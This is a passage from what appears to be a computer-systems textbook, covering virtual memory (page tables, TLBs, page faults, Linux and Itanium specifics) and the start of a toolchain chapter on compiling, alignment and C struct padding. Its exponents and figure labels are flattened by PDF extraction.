each row contains its associated frame — this is termed a linear page-table . If you were to use this simple
system, with a 32 bit address-space and 4 KiB pages there would be 1048576 possible pages to keep track
of in the page table (232 ÷ 4096); hence the table would be 1048576 entries long to ensure we can always
map a virtual page to a physical page.
Page tables can have many different structures and are highly optimised, as the process of finding a page
in the page table can be a lengthly process. We will examine page-tables in more depth later.
The page-table for a process is under the exclusive control of the operating system. When a process requests
memory, the operating system finds it a free page of physical memory and records the virtual-to-physical
translation in the processes page-table. Conversely, when the process gives up memory, the virtual-to-
physical record is removed and the underlying frame becomes free for allocation to another process.
Virtual Addresses
When a program accesses memory, it does not know or care where the physical memory backing the
address is stored. It knows it is up to the operating system and hardware to work together to map locate the
Virtual Memory
96right physical address and thus provide access to the data it wants. Thus we term the address a program is
using to access memory a virtual address . A virtual address consists of two parts; the page and an offset
into that page.
Page
Since the entire possible address space is divided up into regular sized pages, every possible address resides
within a page. The page component of the virtual address acts as an index into the page table. Since the
page is the smallest unit of memory allocation within the system there is a trade-off between making pages
very small, and thus having very many pages for the operating-system to manage, and making pages larger
but potentially wasting memory
Offset
The last bits of the virtual address are called the offset which is the location difference between the byte
address you want and the start of the page. You require enough bits in the offset to be able to get to any byte
in the page. For a 4K page you require (4K == (4 * 1024) == 4096 == 212 ==) 12 bits of offset. Remember
that the smallest amount of memory that the operating system or hardware deals with is a page, so each of
these 4096 bytes reside within a single page and are dealt with as "one".
Virtual Address Translation
Virtual address translation refers to the process of finding out which physical page maps to which virtual
page.
When translating a virtual-address to a physical-address we only deal with the page number . The essence
of the procedure is to take the page number of the given address and look it up in the page-table  to find
a pointer to a physical address, to which the offset from the virtual address is added, giving the actual
location in system memory.
Since the page-tables are under the control of the operating system, if the virtual-address doesn't exist in
the page-table then the operating-system knows the process is trying to access memory that has not been
allocated to it and the access will not be allowed.
Virtual Memory
97Figure 6.3. Virtual Address Translation
Offset Page PointerVirtual Address
Physical Page Frames
(System Memory)0x10000000
Page Size0x10001000Page Table
Physical Page NumberPhysical Page NumberPhysical Page Number
PagePagePage
We can follow this through for our previous example of a simple linear page-table. We calculated that
a 32-bit address-space would require a table of 1048576 entries when using 4KiB pages. Thus to map
a theoretical address of 0x80001234, the first step would be to remove the offset bits. In this case, with
4KiB pages, we know we have 12-bits (212 == 4096) of offset. So we would right-shift out 12-bits of the
virtual address, leaving us with 0x80001. Thus (in decimal) the value in row 524289 of the linear page
table would be the physical frame corresponding to this page.
You might see a problem with a linear page-table : since every page must be accounted for, whether in use
or not, a physically linear page-table is completely impractical with a 64-bit address space. Consider a 64-
bit address space divided into (generously large) 64 KiB pages creates 264/216 = 252 pages to be managed;
assuming each page requires an 8-byte pointer to a physical location a total of 252/23 = 249 or 512 GiB of
contiguous memory is required just for the page table!
Consequences of virtual addresses, pages and
page tables
Virtual addressing, pages and page-tables are the basis of every modern operating system. It under-pins
most of the things we use our systems for.
Individual address spaces
By giving each process its own page table, every process can pretend that it has access to the entire address
space available from the processor. It doesn't matter that two processes might use the same address, since
Virtual Memory
98different page-tables for each process will map it to a different frame of physical memory. Every modern
operating system provides each process with its own address space like this.
Over time, physical memory becomes fragmented , meaning that there are "holes" of free space in the
physical memory. Having to work around these holes would be at best annoying and would become a
serious limit to programmers. For example, if you malloc 8 KiB of memory; requiring the backing of two
4 KiB frames, it would be a huge inconvience if those frames had to be contiguous (i.e., physically next to
each other). Using virutal-addresses it does not matter; as far as the process is concerned it has 8 KiB of
contiguous memory, even if those pages are backed by frames very far apart. By assigning a virtual address
space to each process the programmer can leave working around fragmentation up to the operating system.
Protection
We previously mentioned that the virtual mode of the 386 processor is called protected mode, and this
name arises from the protection that virtual memory can offer to processes running on it.
In a system without virtual memory, every process has complete access to all of system memory. This
means that there is nothing stopping one process from overwriting another processes memory, causing
it to crash (or perhaps worse, return incorrect values, especially if that program is managing your bank
account!)
This level of protection is provided because the operating system is now the layer of abstraction between
the process and memory access. If a process gives a virtual address that is not covered by its page-table,
then the operating system knows that that process is doing something wrong and can inform the process
it has stepped out of its bounds.
Since each page has extra attributes, a page can be set read only, write only or have any number of other
interesting properties. When the process tries to access the page, the operating system can check if it has
sufficient permissions and stop it if it does not (writing to a read only page, for example).
Systems that use virtual memory are inherently more stable because, assuming the perfect operating
system, a process can only crash itself and not the entire system (of course, humans write operating systems
and we inevitably overlook bugs that can still cause entire systems to crash).
Swap
We can also now see how the swap memory is implemented. If instead of pointing to an area of system
memory the page pointer can be changed to point to a location on a disk.
When this page is referenced, the operating system needs to move it from the disk back into system memory
(remember, program code can only execute from system memory). If system memory is full, then another
page needs to be kicked out of system memory and put into the swap disk before the required page can be
put in memory. If another process wants that page that was just kicked out back again, the process repeats.
This can be a major issue for swap memory. Loading from the hard disk is very slow (compared to
operations done in memory) and most people will be familiar with sitting in front of the computer whilst
the hard disk churns and churns whilst the system remains unresponsive.
mmap
A different but related process is the memory map, or mmap (from the system call name). If instead of
the page table pointing to physical memory or swap the page table points to a file, on disk, we say the
file is mmaped.
Normally, you need to open a file on disk to obtain a file descriptor, and then read and write it in a
sequential form. When a file is mmaped it can be accessed just like system RAM.
Virtual Memory
99Sharing memory
Usually, each process gets its own page table, so any address it uses is mapped to a unique frame in physical
memory. But what if the operating system points two page table-entries to the same frame? This means
that this frame will be shared; and any changes that one process makes will be visible to the other.
You can see now how threads are implemented. In the section called “ clone” we said that the Linux
clone()  function could share as much or as little of a new process with the old process as it required. If
a process calls clone()  to create a new process, but requests that the two processes share the same page
table, then you effectively have a thread as both processes see the same underlying physical memory.
You can also see now how copy on write is done. If you set the permissions of a page to be read-only,
when a process tries to write to the page the operating system will be notified. If it knows that this page is
a copy-on-write page, then it needs to make a new copy of the page in system memory and point the page
in the page table to this new page. This can then have its attributes updated to have write permissions and
the process has its own unique copy of the page.
Disk Cache
In a modern system, it is often the case that rather than having too little memory and having to swap
memory out, there is more memory available than the system is currently using.
The memory hierarchy tells us that disk access is much slower than memory access, so it makes sense to
move as much data from disk into system memory if possible.
Linux, and many other systems, will copy data from files on disk into memory when they are used. Even
if a program only initially requests a small part of the file, it is highly likely that as it continues processing
it will want to access the rest of file. When the operating system has to read or write to a file, it first checks
if the file is in it's memory cache.
These pages should be the first to be removed as memory pressure in the system increases.
Page Cache
A term you might hear when discussing the kernel is the page cache .
The page cache  refers to a list of pages the kernel keeps that refer to files on disk. From above, swap page,
mmaped pages and disk cache pages all fall into this category. The kernel keeps this list because it needs
to be able to look them up quickly in response to read and write requests XXX: this bit doesn't file?
Hardware Support
So far, we have only mentioned that hardware works with the operating system to implement virtual
memory. However we have glossed over the details of exactly how this happens.
Virtual memory is necessarily quite dependent on the hardware architecture, and each architecture has its
own subtleties. However, there are are a few universal elements to virtual memory in hardware.
Physical v Virtual Mode
All processors have some concept of either operating in physical or virtual mode. In physical mode, the
hardware expects that any address will refer to an address in actual system memory. In virtual mode, the
hardware knows that addresses will need to be translated to find their physical address.
Virtual Memory
100In many processors, this two modes are simply referred to as physical and virtual mode. Itanium is one such
example. The most common processor, the x86, has a lot of baggage from days before virtual memory and
so the two modes are referred to as real and protected  mode. The first processor to implement protected
mode was the 386, and even the most modern processors in the x86 family line can still do real mode,
though it is not used. In real mode the processor implements a form of memory organisation called
segmentation.
Issues with segmentation
Segmentation is really only interesting as a historical note, since virtual memory has made it less relevant.
Segmentation has a number of drawbacks, not the least of which it is very confusing for inexperienced
programmers, which virtual memory systems were largely invented to get around.
In segmentation there are a number of registers which hold an address that is the start of a segment. The
only way to get to an address in memory is to specify it as an offset from one of these segment registers.
The size of the segment (and hence the maximum offset you can specify) is determined by the number
of bits available to offset from segment base register. In the x86, the maximum offset is 16 bits, or only
64K1 . This causes all sorts of havoc if one wants to use an address that is more than 64K away, which
as memory grew into the megabytes (and now gigabytes) became more than a slight inconvenience to a
complete failure.
Figure 6.4. Segmentation
Segment Register
Segment Register
Segment RegisterHow do we get this address?
CPU
1Imagine that the maximum offset was 32 bits; in this case the entire address space could be accessed as an offset from a segment at 0x00000000
and you would essentially have a flat layout -- but it still isn't as good as virtual memory as you will see. In fact, the only reason it is 16 bits is
because the original Intel processors were limited to this, and the chips maintain backwards compatibility.
Virtual Memory
101In the above figure, there are three segment registers which are all pointing to segments. The maximum
offset (constrained by the number of bits available) is shown by shading. If the program wants an address
outside this range, the segment registers must be reconfigured. This quickly becomes a major annoyance.
Virtual memory, on the other hand, allows the program to specify any address and the operating system
and hardware do the hard work of translating to a physical address.
The TLB
The Translation Lookaside Buffer  (or TLB for short) is the main component of the processor responsible
for virtual-memory. It is a cache of virtual-page to physical-frame translations inside the processor. The
operating system and hardware work together to manage the TLB as the system runs.
Page Faults
When a virtual address is requested of the hardware — say via a load instruction requesting to get some
data — the processor looks for the virtual-address to physical-address translation in its TLB. If it has a
valid translation it can then combine this with the offset portion to go straight to the physical address and
complete the load.
However, if the processor can not find a translation in the TLB, the processor must raise a page fault . This
is similar to an interrupt (as discussed before) which the operating system must handle.
When the operating system gets a page fault, it needs to go through it's page-table to find the correct
translation and insert it into the TLB.
In the case that the operating system can not find a translation in the page table, or alternatively if the
operating system checks the permissions of the page in question and the process is not authorised to access
it, the operating system must kill the process. If you have ever seen a segmentation fault (or a segfault)
this is the operating system killing a process that has overstepped its bounds.
Should the translation be found, and the TLB currently be full, then one translation needs to be removed
before another can be inserted. It does not make sense to remove a translation that is likely to be used in
the future, as you will incur the cost of finding the entry in the page-tables all over again. TLBs usually
use something like a Least Recently Used  or LRU algorithm, where the oldest translation that has not been
used is ejected in favour of the new one.
The access can then be tried again, and, all going well, should be found in the TLB and translated correctly.
Finding the page table
When we say that the operating system finds the translation in the page table, it is logical to ask how the
operating system finds the memory that has the page table.
The base of the page table will be kept in a register associated with each process. This is usally called the
page-table base-register or similar. By taking the address in this register and adding the page number to
it, the correct entry can be located.
Other page related faults
There are two other important faults that the TLB can generally generate which help to mange accessed
and dirty pages. Each page generally contains an attribute in the form of a single bit which flags if the
page has been accessed or is dirty.
Virtual Memory
102An accessed page is simply any page that has been accessed. When a page translation is initially loaded
into the TLB the page can be marked as having been accessed (else why were you loading it in?2)
The operating system can periodically go through all the pages and clear the accessed bit to get an idea of
what pages are currently in use. When system memory becomes full and it comes time for the operating
system to choose pages to be swapped out to disk, obviously those pages whose accessed bit has not been
reset are the best candidates for removal, because they have not been used the longest.
A dirty page is one that has data written to it, and so does not match any data already on disk. For example,
if a page is loaded in from swap and then written to by a process, before it can be moved out of swap it
needs to have its on disk copy updated. A page that is clean has had no changes, so we do not need the
overhead of copying the page back to disk.
Both are similar in that they help the operating system to manage pages. The general concept is that a page
has two extra bits; the dirty bit and the accessed bit. When the page is put into the TLB, these bits are set
to indicate that the CPU should raise a fault .
When a process tries to reference memory, the hardware does the usual translation process. However,
it also does an extra check to see if the accessed flag is not set. If so, it raises a fault to the operating
system, which should set the bit and allow the process to continue. Similarly if the hardware detects that
it is writing to a page that does not have the dirty bit set, it will raise a fault for the operating system to
mark the page as dirty.
TLB Management
We can say that the TLB used by the hardware but managed by software. It is up to the operating system
to load the TLB with correct entries and remove old entries.
Flushing the TLB
The process of removing entries from the TLB is called flushing. Updating the TLB is a crucial part
of maintaining separate address spaces for processes; since each process can be using the same virtual
address not updating the TLB would mean a process might end up overwriting another processes memory
(conversely, in the case of threads sharing the address-space is what you want, thus the TLB is not flushed
when switching between threads in the same process).
On some processors, every time there is a context switch the entire TLB is flushed. This can be quite
expensive, since this means the new process will have to go through the whole process of taking a page
fault, finding the page in the page tables and inserting the translation.
Other processors implement an extra address space ID  (ASID) which is added to each TLB translation
to make it unique. This means each address space (usually each process, but remember threads want to
share the same address space) gets its own ID which is stored along with any translations in the TLB.
Thus on a context switch the TLB does not need to be flushed, since the next process will have a different
address space ID and even if it asks for the same virtual address, the address space ID will differ and so the
translation to physical page will be different. This scheme reduces flushing and increases overall system
performance, but requires more TLB hardware to hold the ASID bits.
Generally, this is implemented by having an additional register as part of the process state that includes
the ASID. When performing a virtual-to-physical translation, the TLB consults this register and will only
2Actually, if you were loading it in without a pending access this would be called speculation , which is where you do something with the expectation
that it will pay off. For example, if code was reading along memory linearly putting the next page translation in the TLB might save time and give
a performance improvement.
Virtual Memory
103match those entries that have the same ASID as the currently running process. Of course the width of
this register determines the number of ASID's available and thus has performance implications. For an
example of ASID's in a processor architecture see the section called “Address spaces” .
Hardware v Software loaded TLB
While the control of what ends up in the TLB is the domain of the operating system; it is not the whole
story. The process described in the section called “Page Faults”  describes a page-fault being raised to the
operating system, which traverses the page-table to find the virtual-to-physical translation and installs it in
the TLB. This would be termed a software-loaded TLB  — but there is another alternative; the hardware-
loaded TLB .
In a hardware loaded TLB, the processor architecture defines a particular layout of page-table information
(the section called “Pages + Frames = Page Tables”  which must be followed for virtual address translation
to proceed. In response to access to a virtual-address that is not present in the TLB, the processor will
atomatically walk the page-tables to load the correct translation entry. Only if the translation entry does
not exist will the processor raise an exception to be handled by the operating system.
Implementing the page-table traversal in specialised hardware gives speed advantages when finding
translations, but removes flexibility from operating-systems implementors who might like to implement
alternative schemes for page-tables.
All architectures can be broadly categorised into these two methodlogies. Later, we will examine some
common architectures and their virtual-memory support.
Linux Specifics
Although the basic concepts of virtual memory remain constant, the specifics of implementations are
highly dependent on the operating system and hardware.
Address Space Layout
Linux divides the available address space up into a shared kernel component and private user space
addresses. This means that addresses in the kernel port of the address space map to the same physical
memory for each process, whilst userspace addresses are private to the process. On Linux, the shared
kernel space is at the very top of the available address space. On the most common processor, the 32 bit
x86, this split happens at the 3GB point. As 32 bits can map a maximum of 4GB, this leaves the top 1GB
for the shared kernel region3.
3This is unfortunately an over-simplification, because many machines wanted to support more than 4GB per process. High memory  support allows
processors to get access to a full 4GB via special extensions.
Virtual Memory
104Figure 6.5. Linux address space layout
Kernel
Process Process Process Process
Physical
MemoryProcessor Address Space(Shared)Kernel Space
User Space
(Private)
Pages
Physical Memory Frame
Three Level Page Table
There are many different ways for an operating system to organise the page tables but Linux chooses to
use a hierarchical  system.
As the page tables use a heirarchy that is three levels deep, the Linux scheme is most commonly referred
to as the three level page table . The three level page table has proven to be robust choice, although it is
not without it's criticism. The details of the virtual memory implementation of each processor vary widley
meaning that the generic page table Linux chooses must be portable and relatively generic.
The concept of the three level page table is not difficult. We already know that a virtual address consists of
a page number and an offset in the physical memory page. In a three level page table, the virtual address
is further split up into a number levels.
Each level is a page table of it's own right; i.e. it maps a page number of a physical page. In a single level
page table the "level 1" entry would directly map to the physical frame. In the multilevel version each of
the upper levels gives the address of the physical memory frame holding the next lower levels page table.
Virtual Memory
105Figure 6.6. Linux Three Level Page Table
Physical Page Frames
(System Memory)0x10000000
Page Size0x10001000Level 1
Page Physical Page
Page Physical PageLevel 2
Page Physical Page
Page Physical PageLevel 3
Page Physical Page
Page Physical PageOffsetVirtual Address
Level 3 Level 2 Level 1
So a sample reference involves going to the top level page table, finding the physical frame that the next
level address is on, reading that levels table and finding the physical frame that the next levels page table
lives on, and so on.
At first, this model seems to be needlessly complex. The main reason this model is implemented is for size
considerations. Imagine the theoretical situation of a process with only one single page mapped right near
the end of it's virtual address space. We said before that the page table entry is found as an offset from
the page table base register, so the page table needs to be a contiguous array in memory. So the single
page near the end of the address space requires the entire array, which might take up considerable space
(many, many physical pages of memory).
In a three level system, the first level is only one physical frame of memory. This maps to a second level,
which is again only a single frame of memory, and again with the third. Consequently, the three level
system reduces the number of pages required to only a fraction of those required for the single level system.
There are obvious disadvantages to the system. Looking up a single address takes more references, which
can be expensive. Linux understands that this system may not be appropriate on many different types of
processor, so each architecture can collapse the page table to have less levels easily (for example, the most
common architecture, the x86, only uses a two level system in its implementation).
Hardware support for virtual memory
As covered in the section called “The TLB” , the processor hardware provides a lookup-table that links
virtual addresses to physical addresses. Each processor architecture defines different ways to manage the
TLB with various advantages and disadvantages.
The part of the processor that deals with virtual memory is generally referred to as the Memory Managment
Unit or MMU
Virtual Memory
106x86-64
XXX
Itanium
The Itanium MMU provides many interesting features for the operating system to work with virtual
memory.
Address spaces
the section called “Flushing the TLB”  introduced the concept of the address-space ID  to reduce the
overheads of flushing the TLB when context switching. However, programmers often use threads to allow
execution contexts to share an address space. Each thread has the same ASID and hence shares TLB entries,
leading to increased performance. However, a single ASID prevents the TLB from enforcing protection;
sharing becomes an "all or nothing" approach. To share even a few bytes, threads must forgo all protection
from each other (see also the section called “Protection” ).
Figure 6.7. Illustration Itanium regions and protection keys
Region 0
Region 1
Region 2
Region 3
Region 4
Region 5
Region 6
Region 70x8000 0000 0000 0000
0xA000 0000 0000 0000
0xC000 0000 0000 0000
0xE000 0000 0000 00000x0000 0000 0000 0000
0x2000 0000 0000 0000
0x4000 0000 0000 0000
0x6000 0000 0000 0000
Protection KeysRegion Registers
Protection KeysRegion Registers
Shared Region0x1000 0x1000
Shared Key
Process 1 Process 2
The Itanium MMU considers these problems and provides the ability to share an address space (and hence
translation entries) at a much lower granularity whilst still maintaining protection within the hardware. The
Itanium divides the 64-bit address space up into 8 regions, as illustrated in Figure 6.7, “Illustration Itanium
regions and protection keys” . Each process has eight 24-bit region registers  as part of its state, which each
hold a region ID  (RID) for each of the eight regions of the process address space. TLB translations are
tagged with the RID and thus will only match if the process also holds this RID, as illustrated in Figure 6.8,
“Illustration of Itanium TLB translation” .
Virtual Memory
107Figure 6.8. Illustration of Itanium TLB translation
Region ID Key Virtual Page #  (VPN) Rights Physical Page #  (PPN)
Translation Lookaside Buffer (TLB)
Key Rights Protection
Key RegistersVirtual Address
Physical Page #  (PPN)
Physical AddressOffsetSearch Search
SearchIndex Virtual
Page #  (VPN)Virtual Region #  (VRN)Region Registers
Region ID
Further to this, the top three bits (the region bits) are not considered in virtual address translation. Therefore,
if two processes share a RID (i.e., hold the same value in one of their region registers) then they have an
aliased view of that region. For example, if process-A holds RID 0x100 in region-register 3 and process-
B holds the same RID 0x100 in region-register 5 then process-A, region 3 is aliased to process-B, region
5. This limited sharing means both processes receive the benefits of shared TLB entries without having
to grant access to their entire address space.
Protection Keys
To allow for even finer grained sharing, each TLB entry on the Itanium is also tagged with a protection
key. Each process has an additional number of protection key registers  under operating-system control.
When a series of pages is to be shared (e.g., code for a shared system library), each page is tagged with a
unique key and the OS grants any processes allowed to access the pages that key. When a page is referenced
the TLB will check the key associated with the translation entry against the keys the process holds in its
protection key registers, allowing the access if the key is present or otherwise raising a protection  fault
to the operating system.
The key can also enforce permissions; for example, one process may have a key which grants write
permissions and another may have a read-only key. This allows for sharing of translation entries in a much
wider range of situations with granularity right down to a single-page level, leading to large potential
improvements in TLB performance.
Virtual Memory
108Itanium Hardware Page-Table Walker
Switching context to the OS when resolving a TLB miss adds significant overhead to the fault processing
path. To combat this, Itanium allows the option of using built-in hardware to read the page-table and
automatically load virtual-to-physical translations into the TLB. The hardware page-table walker (HPW)
avoids the expensive transition to the OS, but requires translations to be in a fixed format suitable for the
hardware to understand.
The Itanium HPW is referred to in Intel's documentation as the virtually hashed page-table walker  or
VHPT walker, for reasons which should become clear. Itanium gives developers the option of two mutually
exclusive HPW implementations; one based on a virtual linear page-table and the other based on a hash
table.
It should be noted it is possible to operate with no hardware page-table walker; in this case each TLB miss is
resolved by the OS and the processor becomes a software-loaded architecture. However, the performance
impact of disabling the HPW is so considerable it is very unlikely any benefit could be gained from doing so
Virtual Linear Page-Table
The virtual linear page-table implementation is referred to in documentation as the short format virtually
hashed page-table  (SF-VHPT). It is the default HPW model used by Linux on Itanium.
The usual solution is a multi-level or hierarchical page-table, where the bits comprising the virtual page
number are used as an index into intermediate levels of the page-table (see the section called “Three
Level Page Table” ). Empty regions of the virtual address space simply do not exist in the hierarchical
page-table. Compared to a linear page-table, for the (realistic) case of a tightly-clustered and sparsely-
filled address space, relatively little space is wasted in overheads. The major disadvantage is the multiple
memory references required for lookup.
Virtual Memory
109Figure 6.9. Illustration of a hierarchical page-table
0x123400
0x400 0x123
0x1 0x2 0x3 0x400Virtual Address
Virtual Page NumberOffset
Page Global Directory Page Middle Directory Page Translation EntriesPage SizePage Table BaseFrameFree Physical
FrameFree
Frame
With a 64-bit address space, even a 512~GiB linear table identified in the section called “Virtual Address
Translation”  takes only 0.003% of the 16-exabytes available. Thus a virtual linear page-table  (VLPT) can
be created in a contiguous area of virtual address space.
Just as for a physically linear page-table, on a TLB miss the hardware uses the virtual page number to
offset from the page-table base. If this entry is valid, the translation is read and inserted directly into the
TLB. However, with a VLPT the address of the translation entry is itself a virtual address and thus there is
the possibility that the virtual page which it resides in is not present in the TLB. In this case a nested fault
is raised to the operating system. The software must then correct this fault by mapping the page holding
the translation entry into the VLPT.
Virtual Memory
110Figure 6.10. Itanium short-format VHPT implementation
PGD
PTE's for a contiguous
region of virtual addressesConceptual view of a
hierarchial page tablePTE's entry for a virtual page is found
via simple offset from VLPT base
2^ 642^ 0
Physical FramesVirtual Linear Page TableVLPT Base
Virtual Address SpaceBLTPMD PMD
PTE PTEPMDPGD
PTE
PTEPTE
PTE
This process can be made quite straight forward if the operating system keeps a hierarchical page-table.
The leaf page of a hierarchical page-table holds translation entries for a virtually contiguous region of
addresses and can thus be mapped by the TLB to create the VLPT as described in Figure 6.10, “Itanium
short-format VHPT implementation” .
Virtual Memory
111Figure 6.11. Itanium PTE entry formats
VPN
64 bitsVPN
Hash
PPN PPN
TagPKEY psize
Chain
4 x 64 bitsShort Format Long FormatGlobal VHPT Per-region VHPT
The major advantage of a VLPT occurs when an application makes repeated or contiguous accesses to
memory. Consider that for a walk of virtually contiguous memory, the first fault will map a page full
of translation entries into the virtual linear page-table. A subsequent access to the next virtual page will
require the next translation entry to be loaded into the TLB, which is now available in the VLPT and thus
loaded very quickly and without invoking the operating system. Overall, this will be an advantage if the
cost of the initial nested fault is amortised over subsequent HPW hits.
Themajor drawback is that the VLPT now requires TLB entries which causes an increase on TLB pressure.
Since each address space requires its own page table the overheads become greater as the system becomes
more active. However, any increase in TLB capacity misses should be more than regained in lower refill
costs from the efficient hardware walker. Note that a pathological case could skip over page_size  ÷
translation_size  entries, causing repeated nested faults, but this is a very unlikely access pattern.
The hardware walker expects translation entries in a specific format as illustrated on the left of Figure 6.11,
“Itanium PTE entry formats” . The VLPT requires translations in the so-called 8-byte short format . If the
operating system is to use its page-table as backing for the VLPT (as in Figure 6.10, “Itanium short-format
VHPT implementation” ) it must use this translation format. The architecture describes a limited number
of bits in this format as ignored and thus available for use by software, but significant modification is
not possible.
A linear page-table is premised on the idea of a fixed page size. Multiple page-size support is problematic
since it means the translation for a given virtual page is no longer at a constant offset. To combat this,
each of the 8-regions of the address space ( Figure 6.7, “Illustration Itanium regions and protection keys” )
has a separate VLPT which only maps addresses for that region. A default page-size can be given for each
region (indeed, with Linux HugeTLB, discussed below, one region is dedicated to larger pages). However,
page sizes can not be mixed within a region.
Virtual Memory
112Virtual Hash Table
Using TLB entries in an effort to reduce TLB refill costs, as done with the SF-VHPT, may or may not
be an effective tradeoff. Itanium also implements a hashed page-table  with the potential to lower TLB
overheads. In this scheme, the processor hashes a virtual address to find an offset into a contiguous table.
The previously described physically linear page-table can be considered a hash page-table with a perfect
hash function which will never produce a collision. However, as explained, this requires an impractical
tradeoff of huge areas of contiguous physical memory. However, constraining the memory requirements
of the page table raises the possibility of collisions when two virtual addresses hash to the same offset.
Colliding translations require a chain pointer to build a linked-list of alternative possible entries. To
distinguish which entry in the linked-list is the correct one requires a tag derived from the incoming virtual
address.
The extra information required for each translation entry gives rise to the moniker long-format ~VHPT (LF-
VHPT). Translation entries grow to 32-bytes as illustrated on the right hand side of Figure 6.11, “Itanium
PTE entry formats” .
The main advantage of this approach is the global hash table can be pinned with a single TLB entry.
Since all processes share the table it should scale better than the SF-VHPT, where each process requires
increasing numbers of TLB entries for VLPT pages. However, the larger entries are less cache friendly;
consider we can fit four 8-byte short-format entries for every 32-byte long-format entry. The very large
caches on the Itanium processor may help mitigate this impact, however.
One advantage of the SF-VHPT is that the operating system can keep translations in a hierarchical page-
table and, as long as the hardware translation format is maintained, can map leaf pages directly to the
VLPT. With the LF-VHPT the OS must either use the hash table as the primary source of translation
entries or otherwise keep the hash table as a cache of its own translation information. Keeping the LF-
VHPT hash table as a cache is somewhat suboptimal because of increased overheads on time critical fault
paths, however advantages are gained from the table requiring only a single TLB entry.
113Chapter 7. The Toolchain
Compiled v Interpreted Programs
Compiled Programs
So far we have discussed how a program is loaded into virtual memory, started as a process kept track of
by the operating system and interacts with via system calls.
A program that can be loaded directly into memory needs to be in a straight binary format. The process
of converting source code, written in a language such as C, to a binary file ready to be executed is called
compiling . Not surprisingly, the process is done by a compiler; the most widespread example being gcc TM.
Interpreted programs
Compiled programs have some disadvantages for modern software development. Every time a developer
makes a change, the compiler must be invoked to recreate the executable file. It is a logical extension to
design a compiled program that can read another program listing and execute the code line by line.
We call this type of compiled program a interpreter  because it interprets each line of the input file and
executes it as code. This way the program does does not need to be compiled, and any changes will be
seen the next time the interpreter runs the code.
For their convenience, interpreted programs usually run slower than a compiled counterpart. The overhead
in the program reading and interpreting the code each time is only encountered once for a compiled
program, whilst an interpreted program encounters it each time it is run.
But interpreted languages have many positive aspects. Many interpreted languages actually run in a
virtual machine  that is abstracted from the underlying hardware. Python and Perl 6 are languages
that implement a virtual machine that interpreted code runs on.
Virtual Machines
A compiled program is completely dependent on the hardware of the machine it is compiled for, since it
must be able to simply be copied to memory an executed. A virtual machine is an abstraction of hardware
into software.
For example, Java is a hybrid language that is partly compiled and partly interpreted. Java code is complied
into a program that runs inside a Java Virtual Machine  or more commonly referred to as a JVM. This
means that a compiled program can run on any hardware that has a JVM written for it; so called write
one, run anywhere .
Building an executable
When we talk about the compiler, there are actually three separate steps involved in creating the executable
file.
1.Compiling
2.Assembling
The Toolchain
1143.Linking
The components involved in this process are collectively called the toolchain  because the tools chain the
output of one to the input of the other to create the final output.
Each link in the chain takes the source code progressively closer to being binary code suitable for execution.
Compiling
The process of compiling
The first step of compiling a source file to an executable file is converting the code from the high level,
human understandable language to assembly code . We know from previous chapters than assembly code
works directly with the instructions and registers provided by the processor.
The compiler is the most complex step of process for a number of reasons. Firstly, humans are very
unpredictable and have their source code in many different forms. The compiler is only interested the
actual code, however humans need things like comments and whitespace (spaces, tabs, indents, etc) to
understand code. The process that the compiler takes to convert the human-written source code to its
internal representation is called parsing.
C code
With C code, there is actually a step before parsing the source code called the pre-processor . The pre-
processor is at its core a text replacement program. For example, any variable declared as #define
variable text  will have variable  replaced with text. This preprocessed code is then passed
into the compiler.
Syntax
Any computing language has a particular syntax that describes the rules of the language. Both you and
the compiler know the syntax rules, and all going well you will understand each other. Humans, being
as they are, often forget the rules or break them, leading the compiler to be unable to understand your
intentions. For example, if you were to leave the closing bracket off a if condition, the compiler does
not know where the actual conditional is.
Syntax is most often described in Backus-Naur Form  (BNF)1 which is a language with which you can
describe languages!
Assembly Generation
The job of the compiler is to translate the higher level language into assembely code suitable for the target
being compiled for. Obviously each different architecture has a different instruction set, different numbers
of registers and different rules for correct operation.
1In fact the most common form is Extended Backus-Naur Form, or EBNF, as it allows some extra rules which are more suitable for modern languages.
The Toolchain
115Alignment
Figure 7.1. Alignment
0 4 8 12
Memory
CPUAlignedUnaligned
Registers
Alignment of variables in memory is an important consideration for the compiler. Systems programmers
need to be aware of alignment constratins to help the compiler create the most efficient code it can.
CPUs can generally not load a value into a register from an aribtrary memory location. It requires that
variables be aligned on certain boundaries. In the example above, we can see how a 32 bit (4 byte) value
is loaded into a register on a machine that requires 4 byte alignment of variables.
The first variable can be directly loaded into a register, as it falls between 4 byte boundaries. The second
variable, however, spans the 4 byte boundary. This means that at minimum two loads will be required to
get the variable into a single register; firstly the lower half and then the upper half.
Some architectures, such as x86, can handle unaligned loads in hardware and the only symptoms will
be lower performance as the hardware does the extra work to get the value into the register. Others
architectures can not have alignment rules violated and will raise an exception which is generally caught by
the operating system which then has to manually load the register in parts, causing even more overheads.
Structure Padding
Programmers need to consider alignment especially when creating structs. Whilst the compiler knows
the alignment rules for the architecture it is building for, at times programmers can cause suboptimal
behaviour.
The C99 standard only says that structures will be ordered in memory in the same order as they are specified
in the declaration, and that in an array of structures all elements will be the same size.
The Toolchain
116Example 7.1. Struct padding example
  1 
                  $ cat struct.c
    #include <stdio.h>
    
  5 struct a_struct {
            char char_one;
            char char_two;
            int int_one;
    };
 10 
    int main(void)
    {
    
            struct a_struct s;
 15 
            printf("%p : s.char_one\n" \
                   "%p : s.char_two\n" \
                   "%p : s.int_one\n", &s.char_one,
                   &s.char_two, &s.int_one);
 20 
            return 0;
    
    }
    
 25 $ gcc -o struct struct.c
    
    $ gcc -fpack-struct -o struct-packed struct.c
    
    $ ./struct
 30 0x7fdf6798 : s.char_one
    0x7fdf6799 : s.char_two
    0x7fdf679c : s.int_one
    
    $ ./struct-packed
 35 0x7fcd2778 : s.char_one
    0x7fcd2779 : s.char_two
    0x7fcd277a : s.int_one
    
                
In the example above, we contrive a structure that has two bytes ( chars followed by a 4 byte integer.
The compiler pads the structure as below.
Figure 7.2. Alignment
0x7fdf6798 0x7fdf6799 0x7fdf679A 0x7fdf679B 0x7fdf679C 0x7fdf679D 0x7fdf679E 0x7fdf679F 0x7fdf6700s.int_ones.char_twos.char_one
The Toolchain
117In the other example we direct the compiler not to pad structures and correspondingly we can see that the
integer starts directly after the two chars.
Cache line alignment
We talked previously about aliasing in the cache, and how several addresses may map to the same cache
line. Programmers need to be sure that when they write their programs they do not cause bouncing of
cache lines.
This situation occurs when a program constantly accesses two areas of memory that map to the same cache
line. This effectively wastes the cache line, as it gets loaded in, used for a short time and then must be
kicked out and the other cache line loaded into the same place in the cache.
Obviously if this situation repeats the performance will be significantly reduced. The situation would be
releaved if the confilicting data were organised in slightly different ways to avoid the cache line conflict.
